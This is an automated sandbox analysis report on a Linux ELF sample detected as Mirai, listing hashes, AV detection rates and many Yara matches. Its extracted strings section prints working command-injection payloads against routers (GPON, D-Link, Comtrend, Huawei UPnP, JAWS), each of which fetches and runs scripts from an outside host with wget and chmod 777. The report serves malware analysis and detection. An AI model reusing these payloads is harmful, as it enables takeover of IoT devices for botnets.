Linux Analysis Report
tknjinyyHK

Overview

General Information

Sample Name:	tknjinyyHK
Analysis ID:	679630
MD5:	207b92b6ce447a8be88fee4f5ab257d6
SHA1:	a2b8c7518f370a978dda19ade031c9d1885acb5e
SHA256:	7274ee8cc094cdfcab48b23978837b12d01bd426202f34d7191e0f6fc3ae18d3
Tags:	32elfintelmirai
Infos:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Mirai

Machine Learning detection for sample

Enumerates processes within the "proc" file system

Yara signature match

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: tknjinyyHK

Avira: detected

Multi AV Scanner detection for submitted file

Source: tknjinyyHK	Virustotal: Detection: 55%	Perma Link
Source: tknjinyyHK	Metadefender: Detection: 37%	Perma Link
Source: tknjinyyHK	ReversingLabs: Detection: 69%

Machine Learning detection for sample

Source: tknjinyyHK

Joe Sandbox ML: detected

Source: tknjinyyHK	String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: tknjinyyHK	String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: tknjinyyHK	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: tknjinyyHK	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: tknjinyyHK	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Malicious sample detected (through community Yara rule)

Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Yara signature match

Source: tknjinyyHK, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: tknjinyyHK, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6235.1.000000000905c000.000000000905d000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.000000000905c000.000000000905d000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008062000.0000000008063000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.0000000008062000.0000000008063000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+;sh+Jaws.sh HTTP/1.1
Source: Initial sample	Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0

Source: classification engine

Classification label: mal76.troj.lin@0/0@0/0

Enumerates processes within the "proc" file system

Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/6236/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236)	File opened: /proc/2033/exe	Jump to behavior
